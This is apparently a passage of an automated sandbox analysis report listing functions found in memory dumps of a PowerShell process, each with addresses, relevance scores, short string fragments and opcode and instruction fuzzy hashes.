                                          • Instruction ID: 5345dea2b148798f5bc6303d21a5924eb1a419f4174379943100c74d19598fd1
                                          • Opcode Fuzzy Hash: 4bd02f960b54049d735a232454f88336944f522c7ca20a5f99e73480c656d29a
                                          • Instruction Fuzzy Hash: A7035E74E003289FEB64DB54C851BDAB7B2BF85304F1095A9D80AAB741CB75EE81CF91
                                          Function 06FBC92E Relevance: 11.2, Strings: 8, Instructions: 1234COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2643865329.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_6fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: tLk$tLk$tLk$tLk$x.k$x.k$-k$-k
                                          • API String ID: 0-2892990940
                                          • Opcode ID: 4142a4f1ccf7dcbbbf9c047bafa43aad76fe57937f477f4d20882d475cf02066
                                          • Instruction ID: 60f6092009d5b88d98ba9dac0f21d054bd96cdfbfc5c7063e7a91fb50c515eb6
                                          • Opcode Fuzzy Hash: 4142a4f1ccf7dcbbbf9c047bafa43aad76fe57937f477f4d20882d475cf02066
                                          • Instruction Fuzzy Hash: 5CC29F74E013249FD764DB24C851BDAB7B2AF89304F1095A9D80EAB741CB76EE81CF91
                                          Function 06FB60C8 Relevance: 7.4, Strings: 5, Instructions: 1182COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2643865329.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_6fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: tLk$x.k$x.k$-k$-k
                                          • API String ID: 0-2660389975
                                          • Opcode ID: 68ccdd55fe759a847421acf076853c9cd927bbcde3ad984542770d4e0bac81b0
                                          • Instruction ID: 1aa7d7377f3a66f4b95cabe86b76a0624481b73ad8cdcf3e04c42eb8709433bb
                                          • Opcode Fuzzy Hash: 68ccdd55fe759a847421acf076853c9cd927bbcde3ad984542770d4e0bac81b0
                                          • Instruction Fuzzy Hash: C9A2C174E00324DFEB60DB55C855BAAB7B2BF85301F1494AAD80AAB741CB71ED81CF91
                                          Function 06FB7282 Relevance: 5.9, Strings: 4, Instructions: 890COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2643865329.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_6fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: tLk$tLk$x.k$-k
                                          • API String ID: 0-1623445408
                                          • Opcode ID: 99dd838f96bf9961c2d7741591a1b5f7e12290a1a389839b65799ad21624210e
                                          • Instruction ID: a7f4c062fb5a850f605d33f1892319a983a3ae15bd7cf29a0f971be1cf84ffa1
                                          • Opcode Fuzzy Hash: 99dd838f96bf9961c2d7741591a1b5f7e12290a1a389839b65799ad21624210e
                                          • Instruction Fuzzy Hash: 1682BF74E00324DFDB60DB55C841B9AB7B2BB85301F14D5AAE90AAB741CB71ED81CF91
                                          Function 06FB744C Relevance: 4.4, Strings: 3, Instructions: 649COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2643865329.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_6fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: tLk$x.k$-k
                                          • API String ID: 0-3645065327
                                          • Opcode ID: b4259a9da08898ae88c1016d4151806714487b5fb6d25803c90421798fe4a220
                                          • Instruction ID: 0b217566777d5e82644ad7c8101d55d583e6e73109d28af924d5f42c416581b3
                                          • Opcode Fuzzy Hash: b4259a9da08898ae88c1016d4151806714487b5fb6d25803c90421798fe4a220
                                          • Instruction Fuzzy Hash: 7552BF74E00324DFEB60DB54C841B9AB7B2BB84305F14D5A9E90AAB741CB76ED81CF91
                                          Function 06FBCAEF Relevance: 4.4, Strings: 3, Instructions: 628COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2643865329.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_6fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: tLk$x.k$-k
                                          • API String ID: 0-3645065327
                                          • Opcode ID: 54bcd1a9ccdb45395a24fc4a2253c50f0e32e69c937dc1fadf568ae4a7a8d600
                                          • Instruction ID: 2ca333dc2bde1b2fc7ca873b0a57faf13acb659ad8c32252197841d5fb8a3326
                                          • Opcode Fuzzy Hash: 54bcd1a9ccdb45395a24fc4a2253c50f0e32e69c937dc1fadf568ae4a7a8d600
                                          • Instruction Fuzzy Hash: 2B42BF70E017249FD764DB64C851BDAB7B2AF89304F1095A9D80EAB741CB36EE81CF91
                                          Function 06FBCD84 Relevance: 2.9, Strings: 2, Instructions: 435COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2643865329.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_6fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: tLk$x.k
                                          • API String ID: 0-3601675571
                                          • Opcode ID: 10784985d59f56c9988fc25e27f274fe518225924770c4c61198d76afda10c4e
                                          • Instruction ID: afbe2d511c9dfc90e651473c45a60f4cf516215ad346d2518655bbe7eec12039
                                          • Opcode Fuzzy Hash: 10784985d59f56c9988fc25e27f274fe518225924770c4c61198d76afda10c4e
                                          • Instruction Fuzzy Hash: 4B122A74E40224DFEBA0CB15C851BEAB7B2BF45344F1494A9E40AAB751CB71ED81CF52
                                          Function 06FBCB78 Relevance: 2.9, Strings: 2, Instructions: 434COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2643865329.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_6fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: tLk$x.k
                                          • API String ID: 0-3601675571
                                          • Opcode ID: 5509460d8a051f506137a059a740c17509e162c1e3dd0d4c68056cf9f138fa7f
                                          • Instruction ID: 88b054c71c83eb4f0689368eecd24a4981fdb2eea3dd35398739fb9002df28e1
                                          • Opcode Fuzzy Hash: 5509460d8a051f506137a059a740c17509e162c1e3dd0d4c68056cf9f138fa7f
                                          • Instruction Fuzzy Hash: DA121974E40225DFEBA0CB15C851BEAB7B2BF45344F1094A9E40AAB751CB71ED81CF92
                                          Function 06FB7C60 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2643865329.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_6fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: x.k
                                          • API String ID: 0-3814145804
                                          • Opcode ID: baf177c0026064d2f0afd6db05a029b7ff4f6591f687830a6b55c9df98fbac84
                                          • Instruction ID: ca6885397909487fe4e50a3eaf66fc8a661b6cef14fee9e9f068b6073a1e8b44
                                          • Opcode Fuzzy Hash: baf177c0026064d2f0afd6db05a029b7ff4f6591f687830a6b55c9df98fbac84
                                          • Instruction Fuzzy Hash: F331E534B40324ABE724AB64C955BAE7663ABC4745F24C024E9066F7C1CF7ADC428BE1
                                          Function 06FB2070 Relevance: .6, Instructions: 585COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2643865329.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_6fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 036b360a07fd370f823da2bc005ac7ae6bf2b1da7ae118d73dd2d31561bf0d72
                                          • Instruction ID: b4d5c772854cdb2793ca314850bad6be268b8172115949df47264453d45e0e07
                                          • Opcode Fuzzy Hash: 036b360a07fd370f823da2bc005ac7ae6bf2b1da7ae118d73dd2d31561bf0d72
                                          • Instruction Fuzzy Hash: 4C124A31F04314DFDB658B6A98157FABBA2AFC6211F14907AD905CB351DA32CE41C7E1
                                          Function 06FB7E18 Relevance: .5, Instructions: 544COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2643865329.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_6fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 76edff87930444903379d92774a7fb53d396d42b424331ea4918e864d42d48b7
                                          • Instruction ID: 3ff48b1d5aba3b7a79188fc0fae2b02bb8af2ed21f1f16e73c608a91530e4600
                                          • Opcode Fuzzy Hash: 76edff87930444903379d92774a7fb53d396d42b424331ea4918e864d42d48b7
                                          • Instruction Fuzzy Hash: 4022AB74F012149FE754CB99C445F9ABBB3AF85345F249068E806AF392CB72EC42CB91
                                          Function 08E320C0 Relevance: .4, Instructions: 433COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2661050678.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_8e30000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 90660275d083eaab0c3da58cd5f7264688121c2356b55003c2bba72046dfb4d0
                                          • Instruction ID: e47c75c897a5f06ec62d76d9e29ad0897c91d29a3b5b17a4a896168f59ec58d0
                                          • Opcode Fuzzy Hash: 90660275d083eaab0c3da58cd5f7264688121c2356b55003c2bba72046dfb4d0
                                          • Instruction Fuzzy Hash: 25024E75A00219EFDB05CF98D884AEDBBB2FF88311F248159E955AB361C771ED81CB90
                                          Function 08E316E8 Relevance: .4, Instructions: 426COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2661050678.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_8e30000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0adbb4b602aff2447ca1a2d48a855b0d34ca0c1f5c92caf85282a2262a6460fd
                                          • Instruction ID: d6936512e9757119b83fc1a45ed88399a33edeac5e274e29f322546999ef8e62
                                          • Opcode Fuzzy Hash: 0adbb4b602aff2447ca1a2d48a855b0d34ca0c1f5c92caf85282a2262a6460fd
                                          • Instruction Fuzzy Hash: 77023C75A01219EFDB05CF98D484AEDBBB2FF49314F248159E845AB361C771ED82CB90
                                          Function 08E32680 Relevance: .4, Instructions: 412COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2661050678.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_8e30000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 53f724129869a6b19f9366765b5bc61eb8cd84bc648bc6d274ff2f2f0e0c3e75
                                          • Instruction ID: 1e19e67535d3422a326521b87ee720c079b8790c0a7c014bd16c2dda4d4b4f3e
                                          • Opcode Fuzzy Hash: 53f724129869a6b19f9366765b5bc61eb8cd84bc648bc6d274ff2f2f0e0c3e75
                                          • Instruction Fuzzy Hash: 18023E75A00219EFDB05CF98D484AADBBB2FF48315F248159E945AB355C771EC82CF90
                                          Function 06FB7DF5 Relevance: .4, Instructions: 400COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2643865329.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_6fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5e879be5f9041d4a7ab3a35ae349f1c947f04efc5636a0690b2bc70b9966f2e6
                                          • Instruction ID: 305dcc7d2a1bb44f5b5426dbe4b638ab9f7a045140877b10cf058a25bb8f1e47
                                          • Opcode Fuzzy Hash: 5e879be5f9041d4a7ab3a35ae349f1c947f04efc5636a0690b2bc70b9966f2e6
                                          • Instruction Fuzzy Hash: 20F19B34F412149FD754CF99C841E9ABBB2EF89345F189069E815AF392CB72EC42CB91
                                          Function 08E50AE0 Relevance: .4, Instructions: 380COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2661116976.0000000008E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_8e50000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 78776fdc5d69a1d581f33727335133aec9b057ee8d3cd6a614347428a3c0cea5
                                          • Instruction ID: 7f4270c236a56d630ecafb7352a674a6e42566c7dfe390273b5e12fcc348e38d
                                          • Opcode Fuzzy Hash: 78776fdc5d69a1d581f33727335133aec9b057ee8d3cd6a614347428a3c0cea5
                                          • Instruction Fuzzy Hash: C1E1C432B00614DFDB64CF94C455AAAB7F2BF89716F249069EC05AB351CB32DD41CBA1
                                          Function 08E30800 Relevance: .3, Instructions: 339COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2661050678.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_8e30000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 88fe60e26b5576ae7c76488fb0ff2d4f73b1d834fa06a8e09d0e6a04f76b193c
                                          • Instruction ID: c78778cb9ac0a19863724bf7de7ab22c7c93ca0b6ce4b571728a14cc28671975
                                          • Opcode Fuzzy Hash: 88fe60e26b5576ae7c76488fb0ff2d4f73b1d834fa06a8e09d0e6a04f76b193c
                                          • Instruction Fuzzy Hash: 6DE10675A00619EFDB14CF98D488AADFBB2FF88314F249159E845AB351C771ED82CB90
                                          Function 06FB463C Relevance: .3, Instructions: 312COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2643865329.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_6fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7af1bcfd206bc17ac3f1365d2d1975775b1fc691dffb60e5c58ed81009641933
                                          • Instruction ID: 67ad9b87b477d52c092dc1a2840c67aebeef068c46c0a6ad404d1ff98684c0fb
                                          • Opcode Fuzzy Hash: 7af1bcfd206bc17ac3f1365d2d1975775b1fc691dffb60e5c58ed81009641933
                                          • Instruction Fuzzy Hash: B7C1AD74F402049FD764CB99C545FAAB7F2AB89315F24D068E8059F39ACB72EC42CB91
                                          Function 06FB8B50 Relevance: .2, Instructions: 230COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2643865329.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_6fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ef7d7e57fffcddb0fdf9547f27aafb50a5f64dfb1b5b06959b161b6b4c6faaeb
                                          • Instruction ID: 3002972777a3a7b64686ad5cf60d87814883c476f9f464e8542da8f11bea6064
                                          • Opcode Fuzzy Hash: ef7d7e57fffcddb0fdf9547f27aafb50a5f64dfb1b5b06959b161b6b4c6faaeb
                                          • Instruction Fuzzy Hash: 03716A72F002159FDBA09A3A98017EBBBAAAFC4291F14947BD426DB241DB31D941C7E1
                                          Function 08E30448 Relevance: .2, Instructions: 218COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2661050678.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_8e30000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0ffcaae943eabd829a290a61a7ff371ce17112b3e56fff66ed31d7dea8cbac44
                                          • Instruction ID: d5e75a6bdf51d9682ebe7aecab82306c7f97bc51a4b09cafb13b09f7a162b83f
                                          • Opcode Fuzzy Hash: 0ffcaae943eabd829a290a61a7ff371ce17112b3e56fff66ed31d7dea8cbac44
                                          • Instruction Fuzzy Hash: FC818A71B006198FCB14DBA8C884AAEBBB6FFC8304F148569D4059B755DB34ED46CBA1
                                          Function 08E50C4C Relevance: .2, Instructions: 207COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2661116976.0000000008E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_8e50000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 84aad9cb251315dc8726384816937aec0a099c70c2970dd1d558cedd4aebbf81
                                          • Instruction ID: d19229dc62c52f7600d1733956f3eb36cb2101ab40a263c21708d3dad88e485b
                                          • Opcode Fuzzy Hash: 84aad9cb251315dc8726384816937aec0a099c70c2970dd1d558cedd4aebbf81
                                          • Instruction Fuzzy Hash: 09818C35A40604DFCB14CF94C545A99BBB2BF8931AF28A1A9EC05AB355CB32ED41CB61
                                          Function 06FB204F Relevance: .1, Instructions: 132COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2643865329.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_6fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 33a69e7c946df2f91949903845192df2dba742879c519fa8e11ecb8eecc54271
                                          • Instruction ID: 794b0ce8b79fb4ae0c70b5bfcce288939c5e2e6d808b19620bcfc049c3e27fe3
                                          • Opcode Fuzzy Hash: 33a69e7c946df2f91949903845192df2dba742879c519fa8e11ecb8eecc54271
                                          • Instruction Fuzzy Hash: 25413A31F14310DFDBA08F168955AFA7BA2AF84241F18649AD904DF251C732CF41C7A2
                                          Function 08E32671 Relevance: .1, Instructions: 127COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2661050678.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_8e30000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 22f2e5aa8dda1ad55099bd74b020f78b7a7901347d05accf7e7371693892da52
                                          • Instruction ID: b6d9e4c721cc9bd8a2c80d4d301f562275206e54a79a55b71b042240429d8cca
                                          • Opcode Fuzzy Hash: 22f2e5aa8dda1ad55099bd74b020f78b7a7901347d05accf7e7371693892da52
                                          • Instruction Fuzzy Hash: C2512C75A006199FCB15CF98C494AAEB7B2FF88315F348258E955A7394D331EC92CF84
                                          Function 08E5091D Relevance: .1, Instructions: 125COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2661116976.0000000008E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_8e50000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e1b89f399e4bd3212873fff7799291afad9793f1eb46301a1e3aa4f5f455e4e3
                                          • Instruction ID: f7e55a0278f64392ed64ffcb2c0f7689ad4475abbeb0f125bb5c690b24d06ed8
                                          • Opcode Fuzzy Hash: e1b89f399e4bd3212873fff7799291afad9793f1eb46301a1e3aa4f5f455e4e3
                                          • Instruction Fuzzy Hash: 75319D33B80B15CBEB25567454103BAB7919FC171BB24647EEC46CF286EE36CD4283A2
                                          Function 06FB3E00 Relevance: .1, Instructions: 124COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2643865329.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_6fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6fdd495810c1511918626818d8d8435bbf4ccc9c9ab0bb4768310d7b57e5085b
                                          • Instruction ID: dc3e950d99106268bbab248ca00cb5340e627bc89ccd835a11b0550ac20099df
                                          • Opcode Fuzzy Hash: 6fdd495810c1511918626818d8d8435bbf4ccc9c9ab0bb4768310d7b57e5085b
                                          • Instruction Fuzzy Hash: 9C412B33F402259BDBA45A6A88402EEF7B5AFC4211B24852BD816EB341EB31DD09C7E1
                                          Function 08E316D9 Relevance: .1, Instructions: 118COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2661050678.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_8e30000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 22abe62a04d46d1ed5bb23dfc9f90c158710b2fe0bd94ae46f622e653b3b28f2
                                          • Instruction ID: 683ce938f0e31f40303b0007c855816c4f05aed33c480a008504ffdd58131943
                                          • Opcode Fuzzy Hash: 22abe62a04d46d1ed5bb23dfc9f90c158710b2fe0bd94ae46f622e653b3b28f2
                                          • Instruction Fuzzy Hash: 3D414D75E006199FCB15CF98C484AEEB7B1FF88311B248259E955A7360D731EC51CF90
                                          Function 08E320B1 Relevance: .1, Instructions: 115COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2661050678.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_8e30000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a17c61f3cd5344023641b85ceb30ff750185d5bfcb2ec810450b72daaa37b04b
                                          • Instruction ID: f5983af5e0a48e1a6a5e11af7f6ef4db676c7559debf5f474baba51e880493a0
                                          • Opcode Fuzzy Hash: a17c61f3cd5344023641b85ceb30ff750185d5bfcb2ec810450b72daaa37b04b
                                          • Instruction Fuzzy Hash: AC413C75A005199FCB05CF98C984AAEB7B1FF48315B248268EA55EB3A0C735EC51CF50
                                          Function 06FB4420 Relevance: .1, Instructions: 94COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2643865329.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_6fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 495dd69c68277d0dc8a54b103939f1abad6366a1c4fbf341f597809cd3da2253
                                          • Instruction ID: 7e24a0ffbbbc599a4497a7f33cf1ba7d12e793187dfc6498fdd5dadfc6fd66f9
                                          • Opcode Fuzzy Hash: 495dd69c68277d0dc8a54b103939f1abad6366a1c4fbf341f597809cd3da2253
                                          • Instruction Fuzzy Hash: CA213732B00315DBEBB45A6B8900BB7B7D6ABC0615F24942ADD4ACB38BDD76C851C361
                                          Function 08E307F0 Relevance: .1, Instructions: 87COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2661050678.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_8e30000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 34a521fcaf7fab39f6b05e49420e101b8fb0a22b8a15952f50a2a7e51daf4539
                                          • Instruction ID: edac50660e65adf6550f7c5f0a52f1e3857eabad85bbcd2e61c93428ab789ca0
                                          • Opcode Fuzzy Hash: 34a521fcaf7fab39f6b05e49420e101b8fb0a22b8a15952f50a2a7e51daf4539
                                          • Instruction Fuzzy Hash: D2314C75A00619DFCB15CF99C584AAEFBF2FF88310B248299D559AB751C332EC91CB90
                                          Function 06FB3DDF Relevance: .1, Instructions: 80COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2643865329.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_6fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1bc3b9a4306a818e19f0a1751dbcf4317ef288ae9b2e4011ea72c27700fb6c60
                                          • Instruction ID: ec5cbda964783f98d09e90a149000bd7f3f7654be2fbb19e1cc7b56f04b01ef2
                                          • Opcode Fuzzy Hash: 1bc3b9a4306a818e19f0a1751dbcf4317ef288ae9b2e4011ea72c27700fb6c60
                                          • Instruction Fuzzy Hash: 4D210637E45355EFCFA19E6A89801EEBBB4EF492107254197D818E7342E7309D08CBE2
                                          Function 06FB8B2F Relevance: .1, Instructions: 80COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2643865329.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_6fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 227e985287edaa568de9ac6f3fa4390647658f6c2d5b6a5bb45c677badb1de82
                                          • Instruction ID: be85a28418626b133fb4261e9c0b550c914159bf29ec094e8095aaaec23a9c5d
                                          • Opcode Fuzzy Hash: 227e985287edaa568de9ac6f3fa4390647658f6c2d5b6a5bb45c677badb1de82
                                          • Instruction Fuzzy Hash: BA2102B5E04315EFDBA14E228905BBA7FAA9FC1281F14A0A6D815CF282D736D905C7E1
                                          Function 06FB43FF Relevance: .1, Instructions: 76COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2643865329.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_6fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fd4b3edaa39646fc54e756dc0b4330cc67c75d339c3a7f1d08002b66c6a26961
                                          • Instruction ID: 910e0ac6e0f57089a7f95b92e0d066494e630d7b3b9292c74157090350011fe7
                                          • Opcode Fuzzy Hash: fd4b3edaa39646fc54e756dc0b4330cc67c75d339c3a7f1d08002b66c6a26961
                                          • Instruction Fuzzy Hash: BA213521B0C390AFEFB14A274E547A27FE56F82611F285097AC44DB2CBD9298C58C372
                                          Function 08E52C96 Relevance: .1, Instructions: 72COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2661116976.0000000008E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_8e50000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 08a35ab06a1935fc4dcdcc39ae88d2bf359ee6b18127e50de7c49ee22ef8b5f2
                                          • Instruction ID: 35a2f46518047a77b62dc4ecc12aa963a3f9219c482f737cf8ea68fece08b17b
                                          • Opcode Fuzzy Hash: 08a35ab06a1935fc4dcdcc39ae88d2bf359ee6b18127e50de7c49ee22ef8b5f2
                                          • Instruction Fuzzy Hash: 01117B33B04205DBDF25966998512EAF3A1BBD5126F24803FCF96CB383DA72C5068793
